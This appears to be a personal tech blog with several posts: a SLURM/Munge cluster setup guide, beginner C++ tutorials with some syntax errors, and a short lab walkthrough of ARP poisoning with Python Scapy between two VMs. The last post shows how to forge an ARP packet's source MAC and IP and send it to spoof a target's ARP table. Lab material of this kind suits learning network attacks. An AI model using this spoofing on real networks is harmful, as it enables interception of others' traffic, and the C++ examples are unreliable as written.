Setup SLURM scheduler

Standard

For SLURM documentation, please go here:  https://slurm.schedmd.com/
Simply put, SLURM is a job scheduler system that allows users to allocate compute resources for computational jobs.

The following is my old note during the time I upgraded Maui + Torque to SLURM at my HomeWood’s HPC cluster.
In this example, I will use two hosts to illustrate the installation and configuration of getting a basic slurm up and running:

    Distro: CentOS 6
    Management host: mgmt
    compute host:  compute001

#perform on both mgmt and + compute001:

yum update
yum install wget gcc gcc-c++ make kernel-devel kernel-headers perl rpm-build -y
yum -y install epel-release

#Verify both munge users are the same on both mgmt + compute001
#Or remove user “munge” and re-create a new munge
#Add slurm user with exact uid + gid on both mgmt + nodes:

groupadd -g 497 slurm
useradd -m -c “SLURM ID” -d /var/lib/slurm -u 497 -g slurm -s /bin/bash slurm

#Download blcr:
wget http://crd.lbl.gov/assets/Uploads/FTG/Projects/CheckpointRestart/downloads/blcr-0.8.5.tar.gz

#Build the RPM:
rpmbuild -tb –define ‘with_multilib 0’ blcr-0.8.5.tar.gz

#Install the packages:
cd /root/rpmbuild/RPMS/x86_64/
yum install blcr* –nogpgcheck -y

#Install Munge:
yum install munge munge-libs munge-devel -y

 
#Only on mgmt:
dd if=/dev/urandom bs=1 count=1024 > /etc/munge/munge.key
chown -R munge: /var/log/munge

 
#All nodes:
#then cp munge.key to all of the compute001:/etc/munge/munge.key
scp /etc/munge/munge.key compute001:/etc/munge/

#Edit permission: on compute001
chown -R munge: /etc/munge/
chown -R munge: /var/log/munge
chmod -R 0400 /etc/munge/ /var/log/munge/

 
#Start munge:
/usr/sbin/munged –force
>service munge start

 
#Verify Munge is working:
munge -n
munge -n | unmunge
munge -n | ssh compute001 unmunge
remunge

 

#Back to setting up SLURM
#Dependencies both mgmt + compute001:

yum install openssl openssl-devel pam-devel numactl numactl-devel hwloc hwloc-devel lua lua-devel readline-devel rrdtool-devel ncurses-devel man2html libibmad libibumad hwloc hwloc-devel numactl readline-devel mysql-devel pam-devel perl-ExtUtils-MakeMaker rrdtool freeipmi lua-devel gtk2-devel redhat-lsb redhat-rpm-config -y

 

#Turn off SELinux
#Enable port 6817,6818,7321 udp + tcp
for portnumber in 6817 6818 7321; do iptables -A INPUT -m state –state NEW -p tcp –dport $portnumber -j ACCEPT; done
 
for portnumber in 6817 6818 7321; do iptables -A INPUT -m state –state NEW -p udp –dport $portnumber -j ACCEPT; done

#Sync clock on all nodes and mgmt:
yum install ntp -y
chkconfig ntpd on
ntpdate pool.ntp.org
/etc/init.d/ntpd start

#Only on mgmt:
#Download latest slurm: http://www.schedmd.com/#repos
wget http://www.schedmd.com/download/latest/slurm-16.05.2.tar.bz2
rpmbuild -ta slurm-16.05.2.tar.bz2

#Now, copy all slurm..rpm to all mgmt and compute001. Then install it.
scp slurm* all_nodes:/tmp/
yum –nogpgcheck localinstall slurm*

On mgmt: create slurm.conf  http://slurm.schedmd.com/configurator.easy.html

Or

cp /etc/slurm/slurm.conf.example /etc/slurm.conf
#then substitute with your system info

#When slurm.conf is configured, then copy it to all compute nodes /etc/slurm/
>scp /etc/slurm/slurm.conf compute00x:/etc/slurm/

 
#On mgmt only:
mkdir /var/spool/slurmctld
mkdir /var/spool/slurmd
chown slurm: /var/spool/slurmctld
chown slurm:/var/spool/slurmd
chmod 755 /var/spool/slurmctld
chmod 755 /var/spool/slurmd
touch /var/log/slurmctld.log
chown slurm: /var/log/slurmctld.log
touch /var/log/slurm_jobacct.log /var/log/slurm_jobcomp.log
chown slurm: /var/log/slurm_jobacct.log /var/log/slurm_jobcomp.log

 
#On the compute001:
mkdir /var/spool/slurmd
chown slurm: /var/spool/slurmd
chmod 755 /var/spool/slurmd
touch /var/log/slurmd.log
chown slurm: /var/log/slurmd.log
 

—Verify it:
slurmd -C

#On both mgmt + compute001:
chkconfig slurm on
/etc/init.d/slurm start

 
scontrol update nodename=compute001x state=resume
scontrol update nodename=compute[001-100] state=resume

 
#Possible error:
slurm_receive_msg: Protocol authentication error
[2016-08-03T15:13:19.650] error: slurm_receive_msg [172.20.1.1:49082]: Protocol authentication error
[2016-08-03T15:13:19.650] error: invalid type trying to be freed 65534
[2016-08-03T15:13:20.663] error: Munge decode failed: Expired credential

#Solution: make sure both ntpd sync
#Sync time between sever and node:
yum install ntp
ntpdate server_name
service ntpd start
chkconf ntpd on

#Other error:
#Slurm will not start:

#Solution: make sure proper permission on log and /var/spool/slurmd in /etc/slurm/slurm.conf both server and compute node

 
#Verify:
Display compute nodes:
scontrol show nodes

 
#Run job on server:
srun -N1 /bin/hostname

 
#Display job queue:
scontrol show jobs

 
#Submit script jobs:
sbatch -N1 script-file

Hope you enjoy it!

C++ Switch

Standard

Switch statement is very similar to if-else if- else statement.

Syntax:

switch ( x ) {

case 1:

//do something

break;

case 2:

//do something

break;

}

 

 

Compare the Switch and if-else

Using if-else if-else:

int x = 2;

if (x ==1){

//do something…

}

else if(x==2){

//do something…

}

else{ //do something ….}

 

Using Switch:

int x = 2;

switch(x){

case 1:                   //====if(x==1)

//do something

break;                      //done, exit, bye-bye

case 2:                  //===else if(x==2)

//do something

break;

case 3:                //====else if(x==3)

default :                 //==== else{ //do something }

//do something

}

C++ Function

Standard

Function = collective statements that perform a task.  It is effective toward a repetitive task.

Here is a repeated task:

int (a=2, b=3);

int c=a + b;

 

int (a=1, b=9);

int c=a+b;

 

int (a=20, b=5);

int c = a – b;

 

int(a=100, b=10);

int c = a/b;

 

Using function, you do it once and be done with it:

//Set up a function:

void func_math(int a, int b){

int c = a + b;

int z = a/b;

int y= a – b;

cout <<c<<endl;

cout <<z<<endl;

cout <<y<<endl;

}                    //End of function

int main()

{

func_math(2,3);          //===5

func_math(10,20);     //==30

func_math(19949,948595);

func_math(39474,234);

}

 

Multiplication and Addition:

#include <iostream>
using namespace std;

void math(int a, int b){
int z = a * b;
int x = a + b;

int y = a – b;

int i = a/b;

cout <<“Multiplication of a and b = “<<z<<endl;
cout <<“Sum of a and b = “<<x<<“\n”<<endl;

cout<<“Subtraction of a and b = ” <<y<<endl;

cout <<“Division of a and b = ” <<endl;
}

int main()
{
cout<<“First:”<<endl;
math(10,20);

cout<<“Second:”<<endl;
math(5,10);

cout<<“Third:”<<endl;
math(40,20);
return 0;
}

————

Example2:

void person(string name, int age, string thanhpho){

cout << “My name is “<< name <<

” and I am << age <<” year old.\n” <<

“I am from: “<< thankpho <<endl;

}

main(){

person(“Sky”, 100, “LatLoi”);

person(“Sonny”, 50, “Son”);

person(“Cloud”, 69, “Khodan”);

return 0;

}

C++ intro

Standard

#include <iostream>

using namespace std;

int main()

{

cout << “Hello C++.\n”;            // the \n means newline.

cout << “Hello C++.” <<endl;

int a, b;
int c;

a=1;
b=2;
c=a + b;
cout << “total of a + b = “<< c <<“\n”;

//another example:
int x=30, y=50;
int z=y-x;
cout << “total x and y = ” << z <<“\n”;

//another example:
int i(100);

//Variable total:
int total=a+b+x+y+i;

//Get the total:
cout <<“Total is all variables: “<< total << “\n”;
return 0;

}

————————-

String variable

#include <iostream>

using namespace std;

int main()

{

string username;

cout <<“What is your name? ” << endl;

cin >> username;

cout << “You said your name is: << username<<endl;

}

—————————–

Condition: if, else if, else

#include <iostream>

using namespace std;

 

int main()

{

int totalyear;

string mycity;

cout << “Where are you from? <<endl;

cin >> mycity;

cout <<“How long have you lived there? <<endl;

cin >> totalyear;

if (totalyear > 10){

cout << “You live at “<<mycity <<” for “<<totalyear<<” year.”<<endl;

}

else if (totalyear < 10){

cout <<“You did not live at “<<mycity<< ” that long.”<<endl;

}

else{

cout <<“Exactly ” << totalyear <<” year.”<<endl;

}

}

 

 

 

 

Scapy ARP poisoning

Standard

Using Python scapy, I am going to try an ARP poisoning.

For clarification, I will use 2 VMs= VM01 vs. VM02.

VM01 = my main server

VM02 = my target

 

On VM01, Run scapy, then:

pkt=ARP()

pkt.show()    #this will output something similar to:

[ ARP ]
hwtype= 0x1
ptype= IPv4
hwlen= 6
plen= 4
op= who-has
hwsrc= ##:##:##:##:##:##
psrc= #.#.#.#
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0

There are few significant parameters that need changing and filling in.

  1. hwsrc == hardware of source.  My Ether/MAC address.  Change it to any anything:

pkt.hwsrc=”01:01:01:01:01

2. psrc = This is IP address of source, my IP.  Again, I don’t want to broadcast my IP.  So change it.

pkt.psrc=”192.168.1.254″

3) hwdst = Fill in hardware of your target

4) pdst = IP of your target.

Then verify it:

pkt.show()           #Output should have all the above info

Finally, we launch the attack.  This is focusing on the OSI layer 2, so use scapy’s command: send

send(pkt)

 

On VM02(my victim server), run command:

arp

VM01’s fake hardware and IP mapping will display on VM02’s ARP table.